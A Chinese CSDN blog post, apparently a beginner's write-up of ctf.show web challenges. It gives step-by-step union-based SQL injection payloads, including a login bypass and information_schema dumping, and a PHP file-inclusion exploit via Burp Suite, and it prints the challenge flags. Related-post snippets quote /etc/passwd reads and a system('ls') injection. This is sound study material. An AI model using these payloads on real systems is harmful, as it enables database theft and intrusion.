小白刷题CTF show web方向

已于 2024-03-19 16:10:39 修改
阅读量484 收藏 5
点赞数 8
分类专栏: 学习笔记 文章标签: 网络安全
于 2024-03-12 16:15:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/strawberry47/article/details/136641310
版权
本文讲述了如何通过右键查看源代码、SQL注入技术分析数据库结构,以及使用BurpSuite抓包工具修改POST请求获取文件,涉及GETvsPOST请求的区别和文件包含漏洞的利用。
摘要由CSDN通过智能技术生成

web01

右键查看源代码,再使用在线解密,就可以得出答案了

web02 sql注入

  1. admin' or 1=1 或者 1 or 1=1可以登录
  2. 查询几个字段:1' or 1=1 order by 3 # 使用此语句,判断列数。
    order by 3不会出错,但是order by 4就没有显示了,因此判断共有3列。
    ORDER BY 子句中的数字(如 ORDER BY 4)通常表示按照查询结果中的第几个列进行排序,而不是列名。这意味着 ORDER BY 4 将根据查询结果中的第四列进行排序。
    在这里插入图片描述
  3. 使用-1' union select 1,2,3 # 判断回显的位置
    发现回显位置是2
    在这里插入图片描述
  4. 1' union select 1,database(),3# 查看数据库名称,发现是web2
  5. 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database(); # 查看数据库中的表,返回有 欢迎你,flag,user,说明一共有两个表,分别是flag和user
  6. 1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag';#查看列名,发现只有flag
  7. 1' union select 1,group_concat(flag),3 from web2.flag;# 显示数据,得到答案了
    在这里插入图片描述

补充知识:

  • group_concat(table_name) 是一个聚合函数,它将返回符合 WHERE 条件的所有表的名称,并用逗号分隔。
  • information_schema是一个标准的数据库系统中的元数据信息存储区域,它包含了关于数据库结构的信息,比如数据库、表、列、索引等的信息。
  • 万能密码:admin' or 1=1#

web03 利用burp抓包修改为POST

点进题目后,显示<?php include($_GET['url']);?>,需要用到burp抓包。(burp配置笔记

include()函数用于将指定文件的内容读取并执行。题目是在引导我们利用文件包含漏洞给url传递一个参数

  1. 抓包后,右击它,选择“Send to Repeater”。这样,这个请求就会出现在Repeater标签页中。
  2. 按照图片进行修改,完成后“go”。会在response中看见ctf_go_go_go这个文件
    ctfshow{bc86df47-9ba7-4755-b05d-3bad5eeb5741}
  3. 在url后面加上 /ctf_go_go_go,可以下载文件,打开后就是flag了

一些说明:

GET vs. POST 请求

在Web开发中,GET和POST是两种最常用的HTTP请求方法:

  • GET请求通常用于请求数据从服务器检索数据。数据被添加到URL中,因此有长度限制,而且所有的参数都对用户可见。
  • POST请求则用于向服务器提交数据,比如表单提交。数据在请求体中发送,不会出现在URL中,因此更适合提交敏感信息或大量数据。POST请求没有数据长度限制。
strawberry47
关注
专栏目录
ctfshow web入门全部答案-信息收集【后续持续更新中】
cx17775140296的博客
05-07 462
vim在编辑文件时,是在workbuffer中进行的,缓存中的信息有存放在.swp文件(原文件名加.swp结尾的文件),当连接异常断开,缓存中的信息丢失,但.swp文件依然存在,可以通过这个文件来进行数据恢复。robots.txt是爬虫界一个约定俗成的协议,里面限制了被爬虫爬取的范围,如果没有该文件说明所有内容都可被爬取。直接输入密文为密码时错的,抓包后密文会变成别的密文,再将密文重新修改成原来的密文即可。输入账号admin,密码为邮箱,可以看到密码错误,说明账号存在。访问后台地址并输入账号密码即可。
CTF show web4
qq_43039823的博客
07-22 971
这个题长得跟web3很相似,但是实际上内容不同,得到flag的姿势也是各不相同。 打开题目界面,依旧是老样子,上边光秃秃的就一句include ....结合上题目的知识很清晰的判断出是文件包含漏洞。“PHP:include(), include_once(), require(), require_once()等 老姿势 , url=/etc/passwd 依旧能读出用户的属性,文件包含确认! 尝试着跟上一个题目的思路一样,打开burp 加上一句<?php system("ls")?&g...
ctfshow—web】——信息搜集篇1(web1~20详解)
练习时长两年半的CTF爱好者
02-22 3074
此题为 【从0开始学web】系列第二十题 此系列题目从最基础开始,题目遵循循序渐进的原则 希望对学习CTF WEB的同学有所帮助。
ctf.show web入门
nidaxin的博客
01-21 6027
信息收集 web1:【where is flag】 打开开发者工具 web2:【无法查看源代码】 ctrl+u或者开发者工具·都可以 web3:【where is flag】 直接抓包,查看响应包 web4:【robots】 Robots协议:也称为爬虫协议、机器人协议等,其全称为“网络爬虫排除标准",它通常是一个叫做robots.txt的文本文件,一般放在网站的根目录下。网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 先抓包,发现响应包里面并没有f.
2023年最新网络安全面试题合集(附答案解析)
Forget_liu的博客
06-09 1777
为了拿到心仪的 Offer 之外,除了学好网络安全知识以外,还要应对好企业的面试。 作为一个安全老鸟,工作这么多年,面试过很多人也出过很多面试题目,也在网上收集了各类关于渗透面试题目,里面有我对一些问题的见解,希望能对大家有所帮助。
NSSCTFweb刷题记录
fivesheeptree的博客
07-12 398
如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。将json参数的值解码为,从而使得$json['x']的值等于"wllm"。通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组。
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
网络安全的领域里,CTF(Capture The Flag)竞赛已经成为了一种检验技能和提升知识的重要方式,特别是Web解题部分,它将理论与实践紧密结合,让参赛者在寻找隐藏的Flag中体验到黑客攻防的乐趣。为了在CTF Web解题...
ctf.show_web2解题过程
qq_38634097的博客
05-24 612
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
CTF刷题
m_de_g的博客
06-01 448
BugKu——SSTI 1、判断是否存在ssti漏洞 2*8=16 说明存在ssti漏洞 List item 2、开始模板注入 知道’’的类型是字符型。 3、接下来我们找其父类 找到父类,父类是’object’ 4、因为只有一个’父类’,需要加一个下标, 5、找父类下的所有子类 {{’’.class.bases[0].subclasses()}} 6、接下来使用脚本,跑出那个子类中含有os模块 运行find_func.py脚本 输入字符串的地方,把所有的子类将其放入到其中,然后模块的话,直接
BUUCTF WEB(12月刷题~)
A_dmin的博客
01-21 2126
BUUCTF WEB [RoarCTF 2019]Easy Java BUUCTF WEB [0CTF 2016]piapiapia BUUCTF WEB [CISCN2019 华北赛区 Day1 Web1]Dropbox BUUCTF WEB [CISCN2019 华北赛区 Day1 Web2]ikun BUUCTF WEB [BUUCTF 2018]Online Tool BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei BUUCTF WEB shrine
CTF BugKu平台——Crypto篇刷题记录(后续更新)
Aluxian_的博客
05-31 3618
CTF BugKu平台——Crypto篇抄错的字符 抄错的字符 描述: 老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗:QWIHBLGZZXJSXZNVBZW QW1h base64解码为 Ama BL92 base64解码为 _v ZXJ5 base64解码为 ery X2Nv base64解码为 _co b2w= base64解码为 ol flag{Aman_very_cool} 这题出的确实好u1s1 出题人完胜! ...
小白刷题CTF show web方向(2),2024年最新2024年网络安全社招面试题
2401_84239830的博客
04-11 770
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctf刷题记录2(完结)
m0_73973498的博客
04-02 2265
因为csdn上内容过多编辑的时候会很卡,因此重开一篇,继续刷题之旅。
2024最全CTF入门指南、CTF夺旗赛及刷题网站(建议收藏!)
最新发布
2301_77160226的博客
08-02 1064
CTF(Capture The Flag),中文称为夺旗赛,是网络安全领域中一种备受关注和欢迎的竞赛形式。
0基础小白怎么入门CTF,看这个就够了(附学习笔记、靶场、工具包下载)
z099164的博客
06-24 3865
0基础小白怎么入门CTF,看这个就够了(附学习笔记、靶场、工具包下载)
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!
qq_44005305的博客
11-12 481
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
网络安全技术面试问题
hdwlwang的博客
04-25 288
本文是为了方使各位小伙伴们,在面试中遇到的一问题。
ctf比赛web方向学习路线
04-30
学习CTF比赛Web方向的路线一般如下: 1. 学习Web基础知识,包括HTTP协议、HTML、CSS、JavaScript、SQL等; 2. 掌握常见的Web漏洞,如SQL注入、XSS、CSRF等,了解其原理和防御方法; 3. 学习常见的Web框架,如Django...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值